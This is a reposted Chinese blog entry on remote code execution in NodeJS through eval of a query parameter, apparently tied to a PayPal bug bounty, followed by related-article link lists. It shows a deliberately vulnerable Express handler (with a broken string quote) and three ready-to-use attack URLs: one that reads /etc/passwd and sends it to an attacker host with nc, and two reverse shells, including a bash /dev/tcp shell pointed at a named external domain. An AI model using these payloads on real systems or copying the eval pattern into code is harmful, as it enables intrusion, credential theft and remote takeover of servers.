服务器 NodeJs

NodeJS远程代码执行

Posted in NodeJs onAugust 28, 2016

背景

@Artsploit在挖PayPal的漏洞时，发现一处NodeJS代码执行，奖励$10000美金。

测试

var express = require('express'); 
var app = express(); 
app.get('/', function (req, res) { 
  res.send('Hello eval(req.query.q));
  console.log(req.query.q);
});
app.listen(8080, function () { 
  console.log('Example listening on port 8080!');
});

任意文件读取

http://host:8080/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')

GET SHELL

http://host:8080/?q=var+net+=+require("net"),+sh+=+require("child_process").exec("/bin/bash");var+client+=+new+net.Socket();client.connect(80,+"attackerip",+function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});

GET SHELL2

http://host:8080/?q=require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/wufeifei.com/7890 0>%261"')

NodeJS远程代码执行

- Author -

hebedich

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

NodeJs 相关文章推荐

NodeJS使用jQuery选择器操作DOM

Feb 13 NodeJs

nodejs通过phantomjs实现下载网页

May 04 NodeJs

nodejs进阶(6)—连接MySQL数据库示例

Jan 07 NodeJs

简单好用的nodejs 爬虫框架分享

Mar 26 NodeJs

nodejs个人博客开发第六步数据分页

Apr 12 NodeJs

详解nodejs模板引擎制作

Jun 14 NodeJs

NodeJS收发GET和POST请求的示例代码

Aug 25 NodeJs

nodejs 图片预览和上传的示例代码

Sep 30 NodeJs

nodejs aes 加解密实例

Oct 10 NodeJs

详解微信小程序-获取用户session_key,openid,unionid - 后端为nodejs

Apr 29 NodeJs

nodejs中request库使用HTTPS代理的方法

Apr 30 NodeJs

nodejs+koa2 实现模仿springMVC框架

Oct 21 NodeJs

用NodeJS实现批量查询地理位置的经纬度接口

Aug 16 #NodeJs

使用nodejs中httpProxy代理时候出现404异常的解决方法

Aug 15 #NodeJs

NodeJs的优势和适合开发的程序

Aug 14 #NodeJs

在windows上用nodejs搭建静态文件服务器的简单方法

Aug 11 #NodeJs

Nodejs抓取html页面内容（推荐）

Aug 11 #NodeJs

用nodejs的实现原理和搭建服务器(动态)

Aug 10 #NodeJs

nodejs如何获取时间戳与时间差

Aug 03 #NodeJs

You might like

php park、unpark、ord 函数使用方法（二进制流接口应用实例）

2010/10/19 PHP

codeigniter教程之多文件上传使用示例

2014/02/11 PHP

PHP PDO fetch 模式各种参数的输出结果一览

2015/01/07 PHP

Laravel 5.5基于内置的Auth模块实现前后台登陆详解

2017/12/21 PHP

PHP设计模式之抽象工厂模式实例分析

2019/03/25 PHP

javascript 按回车键相应按钮提交事件

2009/11/02 Javascript

cookie在javascript中的使用技巧以及隐私在服务器端的设置

2012/12/03 Javascript

javascript设置和获取cookie的方法实例详解

2016/01/05 Javascript

JS中Select下拉列表类(支持输入模糊查询)功能

2017/01/17 Javascript

Vuex和前端缓存的整合策略详解

2017/05/09 Javascript

canvas轨迹回放功能实现

2017/12/20 Javascript

JS实现的判断方法、变量是否存在功能示例

2020/03/28 Javascript

深入理解Vue.js轻量高效的前端组件化方案

2018/12/10 Javascript

如何通过shell脚本自动生成vue文件详解

2019/09/10 Javascript

解决Element中el-date-picker组件不回填的情况

2020/11/07 Javascript

Python中用pycurl监控http响应时间脚本分享

2015/02/02 Python

Python实现删除文件中含“指定内容”的行示例

2017/06/09 Python

简单实现python聊天程序

2018/04/01 Python

Python图像处理之图像的缩放、旋转与翻转实现方法示例

2019/01/04 Python

python3实现zabbix告警推送钉钉的示例

2019/02/20 Python

python GUI库图形界面开发之PyQt5结合Qt Designer创建信号与槽的详细方法与实例

2020/03/08 Python

pygame实现飞机大战

2020/03/11 Python

Keras—embedding嵌入层的用法详解

2020/06/10 Python

canvas三角函数模拟水波效果的示例代码

2018/07/03 HTML / CSS

详解HTML5.2版本带来的修改

2020/05/06 HTML / CSS

Mytheresa美国官网：德国知名的女性奢侈品电商

2017/05/27 全球购物

Gap加拿大官网：Gap Canada

2017/08/24 全球购物

机电一体化专业应届本科生求职信

2013/09/27 职场文书

幼师专业毕业生自荐信

2013/09/29 职场文书

前台文员岗位职责及工作流程

2013/11/19 职场文书

优秀团队申报材料

2014/12/26 职场文书

自愿离婚协议书范本

2015/01/26 职场文书

2015教师节师德演讲稿

2015/03/19 职场文书

2016元旦晚会主持词

2015/07/01 职场文书

SqlServer 垂直分表(减少程序改动)

2021/04/16 SQL Server

Python中OpenCV实现简单车牌字符切割

2021/06/11 Python